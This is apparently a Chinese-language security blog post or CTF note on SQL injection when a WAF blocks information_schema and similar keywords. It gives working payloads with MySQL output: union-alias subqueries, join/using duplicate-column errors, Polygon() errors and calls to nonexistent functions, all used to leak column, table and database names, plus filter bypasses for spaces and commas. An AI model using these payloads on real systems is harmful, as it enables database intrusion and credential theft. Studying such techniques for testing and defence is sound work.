爆字段名表名库名

2024-01-01 13:13:40

通过报错爆表名、字段名、库名

某个地方有注入，但waf拦截了information_schema、columns、tables、database、schema等关键字或函数，我们如何去获取当前表名，字段名和库名呢？

Column name

union+别名子查询

普通（union可用）

题目过滤空格和逗号，空格使用%0a，%0b，%0c，%0d，%a0，或者直接使用括号都可以绕过，逗号使用join绕过；

存放flag的字段名未知，information_schema.columns也将表名的hex过滤了，即获取不到字段名；这时可以利用联合查询，让其在已知字段名下出现；

示例

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4   |
+-------------+
| 4   |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
| 4   |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id   | username | password | email  |
+-------------+----------+----------+-------------+
| 1   | admin | admin888 | 110@110.com |
| 120@120.com | 1  | 1  | 1   |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

升级（union不可用）

select name from test where id=1 and (select * from (select * from test as a join test as b) as c);

爆出第一个字段

原理：使用别名时，表中不能出现相同的字段名，于是利用join把表扩充成两份，别名表c中查询到重复字段，成功报错。

接着，利用using爆其他字段

select name from test where id=1 and (select * from (select * from test as a join test as b using(id)) as c);

得到其他字段

select name from test where id=1 and (select * from (select * from test as a join test as b using(id，name)) as c);

通过using所有已知column name，去获取下一个

……

using等价于join操作中的on，例如a和b根据id字段关联，那么以下等价

using(id)

on a.id=b.id

以下2个实例等价：

select a.name,b.age from test as a join test2 as b on a.id=b.id

select a.name,b.age from test as a join test2 as b using(id)

Table name

Polygon(ls1, ls2, ...)

Polygon从多个LineString或WKB LineString参数构造一个值。如果任何参数不表示LinearRing（也就是说，不是一个封闭和简单的LineString），返回值就是NULL

如果传参不是linestring的话，就会爆错，而当如果我们传入的是存在的字段的话，就会爆出已知库、表、列。

Database name

select * from users where uid =1-a();

原理：一个库中存在不同的系统或自定义函数，如果函数不存在，他就会爆出这个库没有此函数。